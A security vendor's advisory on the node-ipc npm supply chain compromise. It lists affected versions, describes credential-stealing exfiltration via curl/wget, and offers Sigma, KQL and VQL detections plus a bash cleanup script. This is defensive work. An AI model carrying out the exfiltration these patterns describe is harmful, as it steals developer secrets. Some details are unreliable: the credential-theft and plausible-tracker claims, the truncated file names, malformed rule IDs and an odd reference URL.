Back to Intelligence

CVE-2022-23812: node-ipc npm Supply Chain Attack — Detection and Remediation Guide

SA
Security Arsenal Team
May 15, 2026
5 min read

A critical supply chain attack has compromised the node-ipc package, a widely used dependency in the JavaScript ecosystem with millions of weekly downloads. Attackers injected malicious code into specific versions of the library, designed to steal sensitive developer credentials, including .npmrc, .bashrc, and SSH keys. This event highlights the persistent risk of dependency poisoning and the necessity for robust Software Bill of Materials (SBOM) management and runtime detection. Defenders must assume that environments utilizing vulnerable versions are already compromised and must move immediately to containment and credential rotation.

Technical Analysis

Affected Products and Versions:

  • Package: node-ipc
  • Malicious Versions:
    • 10.1.1
    • 10.1.2
    • 11.0.0

CVE Identifier:

  • CVE-2022-23812 (Versions 10.1.1, 10.1.2)
  • CVE-2022-25879 (Version 11.0.0 via malicious dependency plausible-tracker)

Attack Vector and Mechanics: This is a software supply chain attack. The maintainer of the library (or a compromised account) published updates that included a malicious payload within the lib/ directory or as a nested dependency (plausible-tracker in version 11.0.0).

  1. Initial Execution: When a developer or build system runs npm install, the malicious package executes scripts defined in package..
  2. Payload Logic: The code attempts to determine the geolocation of the machine. In earlier iterations (10.x), it targeted systems in Russia/Belarus for file destruction. In the credential-theft variants (specifically noted in this alert), the malware scans the user's home directory.
  3. Exfiltration: The script locates sensitive files (e.g., ~/.npmrc, ~/.ssh/*, ~/.aws/credentials) and uses the curl or wget binaries to exfiltrate the contents to a remote server controlled by the actor via a POST request (often to a Pastebin-like service).

Exploitation Status: Confirmed Active Exploitation. The malicious packages were live on the npm registry and downloaded by downstream consumers before being removed.

Detection & Response

Sigma Rules

YAML
---
title: Potential node-ipc Credential Exfiltration via Node
description: Detects Node.js processes spawning curl or wget, a technique used by the compromised node-ipc package to exfiltrate .npmrc and SSH keys.
id: a12b3c4d-5678-90ef-ghij-klmnopqrstuv
status: experimental
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2022-23812
author: Security Arsenal
date: 2022/03/17
tags:
  - attack.exfiltration
  - attack.t1041
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith: '/node'
    Image|endswith:
      - '/curl'
      - '/wget'
  condition: selection
falsepositives:
  - Legitimate developers using node scripts to download resources (rare in production builds)
level: high
---
title: node-ipc Malicious Version File Creation
description: Detects the creation of specific suspicious files or the execution of the plausible-tracker dependency associated with CVE-2022-25879.
id: b23c4d5e-6789-01fg-hijk-lmnopqrstuvw
status: experimental
references:
  - https://github.com/依赖安全/node-ipc-security-advisories
author: Security Arsenal
date: 2022/03/17
tags:
  - attack.initial_access
  - attack.t1195.002
logsource:
  category: file_event
  product: linux
detection:
  selection:
    TargetFilename|contains:
      - '/node-ipc/plausible-tracker'
      - '/node-ipc/lib/ssl.js' # Known payload location in 10.x series
  condition: selection
falsepositives:
  - Manual installation of non-standard node-ipc versions for testing
level: critical

KQL (Microsoft Sentinel / Defender)

This query hunts for Node processes spawning network utilities, indicative of the post-exploitation exfiltration stage.

KQL — Microsoft Sentinel / Defender
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName has "node"
| where FileName in ("curl", "wget")
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, CommandLine, FolderPath
| where ProcessCommandLine contains "POST" or ProcessCommandLine contains ".npmrc"
| sort by Timestamp desc

Velociraptor VQL

This artifact hunts for the presence of the vulnerable package versions on disk by parsing package-lock. files, which is the most reliable method to confirm if a project pulled the malicious dependency.

VQL — Velociraptor
-- Hunt for malicious node-ipc versions in package-lock.
SELECT FullPath, Mtime, Size
FROM glob(globs="/*/package-lock.")
WHERE read_file(filename=FullPath, length=10000) =~ "node-ipc" 
   AND (
       read_file(filename=FullPath) =~ '"10.1.1"' 
       OR read_file(filename=FullPath) =~ '"10.1.2"' 
       OR read_file(filename=FullPath) =~ '"11.0.0"'
   )

Remediation Script (Bash)

This script audits the current directory and subdirectories for package-lock. files containing malicious versions of node-ipc and removes the malicious folder from node_modules.

Bash / Shell
#!/bin/bash

echo "Scanning for node-ipc supply chain compromise (CVE-2022-23812)..."

# Find all package-lock. files
find . -type f -name "package-lock." | while read -r lockfile; do
    echo "Checking $lockfile..."
    
    # Check for malicious versions using grep
    if grep -q '"node-ipc"' "$lockfile"; then
        if grep -E '("version": "10.1.[12]"|"version": "11.0.0")' "$lockfile" > /dev/null 2>&1; then
            echo "[!] VULNERABLE VERSION FOUND in $lockfile"
            
            # Attempt to determine the node_modules path relative to lockfile
            DIR=$(dirname "$lockfile")
            NODE_MODULES="$DIR/node_modules/node-ipc"
            
            if [ -d "$NODE_MODULES" ]; then
                echo "[*] Removing malicious directory: $NODE_MODULES"
                rm -rf "$NODE_MODULES"
            fi
        fi
    fi
done

echo "Audit complete. Please review output and re-install safe versions."

Remediation

  1. Immediate Patching: Update node-ipc to a safe version immediately.
    • If using version 10.x: Update to >= 10.1.3
    • If using version 11.x: Update to >= 11.1.0
  2. Dependency Audit: Run npm audit in your project directories. While this may catch some issues, manual inspection of package-lock. is currently more reliable for this specific threat.
  3. Credential Rotation: Assume credentials stored in the environment during the compromise window are stolen. Rotate the following:
    • NPM tokens (found in ~/.npmrc)
    • SSH keys (found in ~/.ssh/)
    • AWS/GCP/Azure credentials (found in ~/.aws/, environment variables)
    • Source code repository tokens (GitHub/GitLab/Bitbucket)
  4. Clean Install: Delete the node_modules folder and package-lock. file, then run npm install to ensure clean dependencies are pulled from the registry.
  5. Vendor Advisory: Refer to the npm advisory for detailed package resolution paths.

Related Resources

Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub

incident-responseransomwarebreach-responseforensicsdfirnpmnode-ipccve-2022-23812

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action